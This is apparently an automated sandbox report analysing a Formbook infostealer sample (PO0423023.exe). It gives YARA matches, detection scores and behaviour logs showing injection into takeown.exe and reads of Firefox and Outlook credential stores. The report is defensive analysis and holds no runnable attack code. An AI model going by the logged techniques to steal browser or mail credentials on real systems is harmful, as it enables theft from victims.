Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ACC6E0	6_2_03ACC6E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B70591	6_2_03B70591
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB0535	6_2_03AB0535
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B5E4F6	6_2_03B5E4F6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B54420	6_2_03B54420
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B62446	6_2_03B62446
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B66BD7	6_2_03B66BD7
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6AB40	6_2_03B6AB40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AAEA80	6_2_03AAEA80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB29A0	6_2_03AB29A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B7A9A6	6_2_03B7A9A6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AC6962	6_2_03AC6962
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03A968B8	6_2_03A968B8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ADE8F0	6_2_03ADE8F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ABA840	6_2_03ABA840
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB2840	6_2_03AB2840
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B2EFA0	6_2_03B2EFA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ABCFE0	6_2_03ABCFE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AA2FC8	6_2_03AA2FC8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B52F30	6_2_03B52F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AF2F28	6_2_03AF2F28
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AD0F30	6_2_03AD0F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B24F40	6_2_03B24F40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6CE93	6_2_03B6CE93
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AC2E90	6_2_03AC2E90
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6EEDB	6_2_03B6EEDB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6EE26	6_2_03B6EE26
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB0E59	6_2_03AB0E59
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AC8DBF	6_2_03AC8DBF
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AAADE0	6_2_03AAADE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ABAD00	6_2_03ABAD00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B4CD1F	6_2_03B4CD1F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B50CB5	6_2_03B50CB5
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AA0CF2	6_2_03AA0CF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB0C00	6_2_03AB0C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AF739A	6_2_03AF739A
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6132D	6_2_03B6132D
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03A9D34C	6_2_03A9D34C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB52A0	6_2_03AB52A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B512ED	6_2_03B512ED
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ACB2C0	6_2_03ACB2C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ABB1B0	6_2_03ABB1B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AE516C	6_2_03AE516C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03A9F172	6_2_03A9F172
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B7B16B	6_2_03B7B16B
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6F0E0	6_2_03B6F0E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B670E9	6_2_03B670E9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB70C0	6_2_03AB70C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B5F0CC	6_2_03B5F0CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6F7B0	6_2_03B6F7B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B616CC	6_2_03B616CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AF5630	6_2_03AF5630
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B4D5B0	6_2_03B4D5B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B67571	6_2_03B67571
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6F43F	6_2_03B6F43F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AA1460	6_2_03AA1460
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ACFB80	6_2_03ACFB80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B25BF0	6_2_03B25BF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AEDBF9	6_2_03AEDBF9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6FB76	6_2_03B6FB76
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AF5AA0	6_2_03AF5AA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B51AA3	6_2_03B51AA3
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B4DAAC	6_2_03B4DAAC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B5DAC6	6_2_03B5DAC6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B23A6C	6_2_03B23A6C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B67A46	6_2_03B67A46
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6FA49	6_2_03B6FA49
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B45910	6_2_03B45910
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB9950	6_2_03AB9950
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ACB950	6_2_03ACB950
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB38E0	6_2_03AB38E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B1D800	6_2_03B1D800
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6FFB1	6_2_03B6FFB1
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB1F92	6_2_03AB1F92
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6FF09	6_2_03B6FF09
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB9EB0	6_2_03AB9EB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03ACFDC0	6_2_03ACFDC0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B67D73	6_2_03B67D73
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03AB3D40	6_2_03AB3D40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B61D5A	6_2_03B61D5A
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B6FCF2	6_2_03B6FCF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_03B29C32	6_2_03B29C32
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032F15B0	6_2_032F15B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_0330A040	6_2_0330A040
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032EC7A0	6_2_032EC7A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032EC797	6_2_032EC797
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032EAA37	6_2_032EAA37
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032EAA40	6_2_032EAA40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032EC9C0	6_2_032EC9C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 6_2_032F30F0	6_2_032F30F0

Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03AE5130 appears 58 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03B2F290 appears 105 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03A9B970 appears 280 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03AF7E54 appears 111 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03B1EA12 appears 86 times
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: String function: 01A3EA12 appears 86 times
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: String function: 01A05130 appears 58 times
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: String function: 01A17E54 appears 111 times
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: String function: 019BB970 appears 280 times
Source: C:\Users\user\Desktop\PO0423023.exe	Code function: String function: 01A4F290 appears 105 times

Source: PO0423023.exe

Static PE information: invalid certificate

Source: PO0423023.exe, 00000000.00000002.2030982968.0000000002471000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs PO0423023.exe
Source: PO0423023.exe, 00000000.00000002.2030139220.000000000083E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO0423023.exe
Source: PO0423023.exe, 00000000.00000002.2036859525.0000000004CE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs PO0423023.exe
Source: PO0423023.exe, 00000000.00000002.2041089524.0000000009800000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PO0423023.exe
Source: PO0423023.exe, 00000000.00000002.2032569464.0000000003E4E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs PO0423023.exe
Source: PO0423023.exe, 00000003.00000002.2489820971.0000000001ABD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO0423023.exe
Source: PO0423023.exe, 00000003.00000002.2489347958.0000000001538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametakeown.exej% vs PO0423023.exe
Source: PO0423023.exe, 00000003.00000002.2489347958.000000000155C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametakeown.exej% vs PO0423023.exe
Source: PO0423023.exe	Binary or memory string: OriginalFilenametLYg.exeX vs PO0423023.exe

Source: PO0423023.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.PO0423023.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.PO0423023.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3265262776.0000000005940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2489011998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3262815289.00000000038C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2491778083.0000000001CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3262551392.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3261184136.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3262636915.0000000002A20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2491943456.0000000001DA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: PO0423023.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.PO0423023.exe.4073bd0.9.raw.unpack, StKVUPZcBlUxaFRHDJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, StKVUPZcBlUxaFRHDJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0423023.exe.9800000.13.raw.unpack, StKVUPZcBlUxaFRHDJ.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.PO0423023.exe.40f75f0.8.raw.unpack, PvCYnyOPvX6W6wBKo1.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/4

Source: C:\Users\user\Desktop\PO0423023.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO0423023.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\takeown.exe

File created: C:\Users\user\AppData\Local\Temp\43PI9J

Jump to behavior

Source: PO0423023.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PO0423023.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: takeown.exe, 00000006.00000003.2678820495.0000000003603000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOIN ;`
Source: takeown.exe, 00000006.00000002.3261394399.0000000003624000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000003.2678820495.0000000003624000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3261394399.0000000003651000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 00000006.00000002.3261394399.000000000362F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PO0423023.exe	Virustotal: Detection: 35%
Source: PO0423023.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\PO0423023.exe

File read: C:\Users\user\Desktop\PO0423023.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO0423023.exe "C:\Users\user\Desktop\PO0423023.exe"
Source: C:\Users\user\Desktop\PO0423023.exe	Process created: C:\Users\user\Desktop\PO0423023.exe "C:\Users\user\Desktop\PO0423023.exe"
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO0423023.exe	Process created: C:\Users\user\Desktop\PO0423023.exe "C:\Users\user\Desktop\PO0423023.exe"	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\PO0423023.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\BfhsBJESSmvrxvvTUcmuRbsoDWHhTcMOtxhWkIEDZkirMcGdurpwUW\uFKwxSqRZbIimWVtjS.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\PO0423023.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PO0423023.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PO0423023.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PO0423023.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: tLYg.pdb source: PO0423023.exe
Source:	Binary string: takeown.pdbGCTL source: PO0423023.exe, 00000003.00000002.2489347958.0000000001538000.00000004.00000020.00020000.00000000.sdmp, uFKwxSqRZbIimWVtjS.exe, 00000005.00000002.3262104447.0000000000E88000.00000004.00000020.00020000.00000000.sdmp
